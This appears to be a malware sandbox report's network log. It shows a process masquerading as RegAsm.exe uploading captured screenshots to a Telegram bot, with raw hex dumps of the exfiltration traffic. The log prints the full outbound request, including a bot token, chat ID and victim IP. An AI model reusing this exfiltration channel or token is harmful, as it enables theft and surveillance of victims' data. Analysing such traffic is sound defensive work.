                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 30 62 31 32 38 36 33 66 62 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd30b12863fb9cContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:08 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:09 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:09 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449738149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:10 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd30ce2e1e282e
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 30 63 65 32 65 31 65 32 38 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd30ce2e1e282eContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
